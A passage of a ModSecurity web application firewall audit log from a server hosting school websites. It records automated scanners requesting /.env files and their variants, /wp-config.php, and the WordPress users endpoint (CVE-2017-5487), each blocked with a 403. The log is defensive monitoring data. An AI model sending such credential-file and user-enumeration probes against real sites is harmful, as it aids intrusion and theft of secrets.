Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747387905405772 3172 (- - -) Stopwatch2: 1747387905405772 3172; combined=1317, p1=459, p2=829, p3=0, p4=0, p5=29, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6cb0dd67-Z-- --a2c94919-A-- [16/May/2025:16:41:55 +0700] aCcIY0E0LfP59mkCzg732QAAAMk 103.236.140.4 50390 103.236.140.4 8181 --a2c94919-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 202.93.229.2 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 202.93.229.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a2c94919-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a2c94919-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747388515102131 3233 (- - -) Stopwatch2: 1747388515102131 3233; combined=1403, p1=483, p2=890, p3=0, p4=0, p5=30, sr=120, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a2c94919-Z-- --decbb64b-A-- [16/May/2025:16:47:41 +0700] aCcJvUE0LfP59mkCzg738AAAANM 103.236.140.4 50504 103.236.140.4 8181 --decbb64b-B-- GET /.env HTTP/1.0 Host: archiexnz.chickenkiller.com X-Real-IP: 159.65.18.197 X-Forwarded-Host: archiexnz.chickenkiller.com X-Forwarded-Server: archiexnz.chickenkiller.com X-Forwarded-For: 159.65.18.197 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --decbb64b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --decbb64b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747388861313673 774 (- - -) Stopwatch2: 1747388861313673 774; combined=314, p1=281, p2=0, p3=0, p4=0, p5=33, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --decbb64b-Z-- --f118c463-A-- [16/May/2025:17:25:42 +0700] aCcSpse47ocjCGWTS4YQQQAAAFM 103.236.140.4 41506 103.236.140.4 8181 --f118c463-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 159.65.23.207 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 159.65.23.207 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --f118c463-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f118c463-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747391142496378 674 (- - -) Stopwatch2: 1747391142496378 674; combined=304, p1=265, p2=0, p3=0, p4=0, p5=39, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f118c463-Z-- --04f5161f-A-- [16/May/2025:17:38:12 +0700] aCcVlNhEtho3ciA0weg7QgAAAJY 103.236.140.4 49526 103.236.140.4 8181 --04f5161f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 213.231.7.92 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 213.231.7.92 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --04f5161f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --04f5161f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747391892632309 2139 (- - -) Stopwatch2: 1747391892632309 2139; combined=914, p1=325, p2=566, p3=0, p4=0, p5=23, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --04f5161f-Z-- --59f04342-A-- [16/May/2025:17:54:42 +0700] aCcZckE0LfP59mkCzg4XkQAAAMY 103.236.140.4 54274 103.236.140.4 8181 --59f04342-B-- GET /.env.prod HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 93.123.109.229 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 93.123.109.229 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --59f04342-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --59f04342-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747392882407192 797 (- - -) Stopwatch2: 1747392882407192 797; combined=362, p1=327, p2=0, p3=0, p4=0, p5=35, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --59f04342-Z-- --14dd0527-A-- [16/May/2025:17:54:45 +0700] aCcZdUE0LfP59mkCzg4XmgAAAMU 103.236.140.4 54440 103.236.140.4 8181 --14dd0527-B-- GET /.env.dist HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 93.123.109.229 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 93.123.109.229 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --14dd0527-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --14dd0527-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747392885768721 775 (- - -) Stopwatch2: 1747392885768721 775; combined=333, p1=288, p2=0, p3=0, p4=0, p5=45, sr=114, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --14dd0527-Z-- --56c1f52e-A-- [16/May/2025:17:54:48 +0700] aCcZeEE0LfP59mkCzg4XpAAAANU 103.236.140.4 54586 103.236.140.4 8181 --56c1f52e-B-- GET /.env_sample HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 93.123.109.229 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 93.123.109.229 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --56c1f52e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --56c1f52e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747392888603066 723 (- - -) Stopwatch2: 1747392888603066 723; combined=303, p1=266, p2=0, p3=0, p4=0, p5=36, sr=69, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --56c1f52e-Z-- --3c485910-A-- [16/May/2025:17:54:52 +0700] aCcZfEE0LfP59mkCzg4XpgAAANY 103.236.140.4 54764 103.236.140.4 8181 --3c485910-B-- GET /.env.uat HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 93.123.109.229 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 93.123.109.229 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --3c485910-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3c485910-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747392892075588 756 (- - -) Stopwatch2: 1747392892075588 756; combined=338, p1=303, p2=0, p3=0, p4=0, p5=35, sr=120, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3c485910-Z-- --3156f864-A-- [16/May/2025:17:54:56 +0700] aCcZgEE0LfP59mkCzg4XuwAAANI 103.236.140.4 55006 103.236.140.4 8181 --3156f864-B-- GET /.env.bak HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 93.123.109.229 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 93.123.109.229 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --3156f864-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3156f864-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747392896962144 773 (- - -) Stopwatch2: 1747392896962144 773; combined=325, p1=279, p2=0, p3=0, p4=0, p5=46, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3156f864-Z-- --287a8e09-A-- [16/May/2025:17:54:59 +0700] aCcZg8e47ocjCGWTS4Yg8wAAAEA 103.236.140.4 55148 103.236.140.4 8181 --287a8e09-B-- GET /.env.dev.local HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 93.123.109.229 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 93.123.109.229 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --287a8e09-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --287a8e09-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747392899630592 695 (- - -) Stopwatch2: 1747392899630592 695; combined=294, p1=261, p2=0, p3=0, p4=0, p5=33, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --287a8e09-Z-- --e4c2c35a-A-- [16/May/2025:18:02:38 +0700] aCcbTte6THFz1hsaJaLDRgAAAAQ 103.236.140.4 51406 103.236.140.4 8181 --e4c2c35a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 66.76.253.142 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 66.76.253.142 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --e4c2c35a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e4c2c35a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747393358713646 24423 (- - -) Stopwatch2: 1747393358713646 24423; combined=1838, p1=423, p2=1382, p3=0, p4=0, p5=33, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e4c2c35a-Z-- --30d1a803-A-- [16/May/2025:18:50:54 +0700] aCcmnthEtho3ciA0wehaoQAAAIk 103.236.140.4 42822 103.236.140.4 8181 --30d1a803-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.80.2 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.80.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.49 Safari/537.36 Accept-Charset: utf-8 --30d1a803-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --30d1a803-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747396254661578 713 (- - -) Stopwatch2: 1747396254661578 713; combined=308, p1=275, p2=0, p3=0, p4=0, p5=32, sr=114, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --30d1a803-Z-- --b461387d-A-- [16/May/2025:19:45:46 +0700] aCczekE0LfP59mkCzg4wGQAAAMQ 103.236.140.4 43512 103.236.140.4 8181 --b461387d-B-- GET /wp-config.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 142.93.103.28 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Accept: */* User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force Cookie: X-Forwarded-For: 142.93.103.28 Accept-Encoding: gzip X-Varnish: 148842250 --b461387d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --b461387d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747399546885528 974 (- - -) Stopwatch2: 1747399546885528 974; combined=346, p1=309, p2=0, p3=0, p4=0, p5=37, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b461387d-Z-- --f9c7953a-A-- [16/May/2025:20:49:16 +0700] aCdCXMe47ocjCGWTS4Y77AAAAEk 103.236.140.4 45412 103.236.140.4 8181 --f9c7953a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.75.60.19 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.75.60.19 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --f9c7953a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f9c7953a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747403356818258 2400 (- - -) Stopwatch2: 1747403356818258 2400; combined=1115, p1=371, p2=699, p3=0, p4=0, p5=45, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f9c7953a-Z-- --0cb23854-A-- [16/May/2025:21:23:01 +0700] aCdKRdhEtho3ciA0wehbUAAAAJI 103.236.140.4 46384 103.236.140.4 8181 --0cb23854-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 37.130.34.82 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 37.130.34.82 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --0cb23854-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0cb23854-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747405381946278 2764 (- - -) Stopwatch2: 1747405381946278 2764; combined=1267, p1=443, p2=794, p3=0, p4=0, p5=30, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0cb23854-Z-- --6e679063-A-- [16/May/2025:22:10:57 +0700] aCdVgce47ocjCGWTS4Y8XQAAAEc 103.236.140.4 47648 103.236.140.4 8181 --6e679063-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 46.101.111.185 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 46.101.111.185 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --6e679063-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6e679063-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747408257813923 802 (- - -) Stopwatch2: 1747408257813923 802; combined=317, p1=281, p2=0, p3=0, p4=0, p5=36, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6e679063-Z-- --acfb8e2d-A-- [16/May/2025:22:39:10 +0700] aCdcHkE0LfP59mkCzg4ynwAAAME 103.236.140.4 48086 103.236.140.4 8181 --acfb8e2d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 109.175.7.204 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 109.175.7.204 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --acfb8e2d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --acfb8e2d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747409950822696 3057 (- - -) Stopwatch2: 1747409950822696 3057; combined=1339, p1=435, p2=875, p3=0, p4=0, p5=29, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --acfb8e2d-Z-- --04bbf81a-A-- [16/May/2025:23:44:12 +0700] aCdrXEE0LfP59mkCzg40PwAAAMs 103.236.140.4 50126 103.236.140.4 8181 --04bbf81a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 162.0.235.252 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 162.0.235.252 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --04bbf81a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --04bbf81a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747413852297396 3446 (- - -) Stopwatch2: 1747413852297396 3446; combined=1480, p1=515, p2=934, p3=0, p4=0, p5=30, sr=125, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --04bbf81a-Z-- --60ddeb20-A-- [17/May/2025:00:00:13 +0700] aCdvHUE0LfP59mkCzg40TQAAAMY 103.236.140.4 50248 103.236.140.4 8181 --60ddeb20-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 51.81.29.157 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 51.81.29.157 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --60ddeb20-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --60ddeb20-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg 